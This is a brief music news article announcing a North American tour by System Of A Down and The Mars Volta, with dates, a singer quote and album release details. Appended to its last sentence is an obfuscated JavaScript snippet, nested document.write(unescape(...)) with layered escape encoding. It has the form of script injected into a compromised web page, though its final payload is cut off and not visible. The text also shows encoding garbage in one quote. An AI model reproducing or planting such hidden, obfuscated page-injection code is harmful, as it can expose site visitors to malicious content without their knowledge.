System Of A Down and The Mars Volta are teaming up for a North American tour later this year.
Dates and venues have yet to be announced for the two-month long trek, but it is expected that the jaunt will kick off in early August and feature support from an as-yet-unconfirmed third band.
â€With The Mars Volta on the bill, I think we're giving our fans a terrific show," System Of A Down singer Serj Tankian said.
The dates will be System Of A Down's first extended North American tour since 2002. As reported by Billboard.com, the band are currently in the middle of a short club trek which hits Dallas tomorrow night (April 29) before heading out to Lisbon for a month-long European tour.
System Of A Down will release their new album ‘Mezmerize / Hypnotize' in two instalments over six months, with the first half, ‘Mezmerize', out on May 16 through American Recordings / Columbia.
The Mars Volta will be touring their current album 'Frances The Mute'.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
